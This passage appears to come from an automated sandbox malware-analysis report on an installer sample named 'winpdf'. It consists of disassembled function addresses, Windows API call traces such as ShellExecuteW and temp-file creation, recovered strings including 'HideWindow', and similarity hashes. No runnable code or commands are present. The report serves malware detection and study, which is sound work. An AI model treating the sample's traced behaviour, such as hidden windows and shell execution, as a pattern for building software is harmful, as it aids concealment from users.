                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                • String ID: %SenSurvival%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                • API String ID: 247603264-3974587372
                                                                                                                                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 911 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 922 402223-4030f2 call 4062a3 911->922 923 40220d-40221b call 4062a3 911->923 923->922
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                Strings
                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                • API String ID: 3156913733-2180253247
                                                                                                                                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                APIs
                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 3850602802-2810827130
                                                                                                                                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                • String ID: nsa
                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394109436-0
                                                                                                                                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 3850602802-2810827130
                                                                                                                                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 3850602802-2810827130
                                                                                                                                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
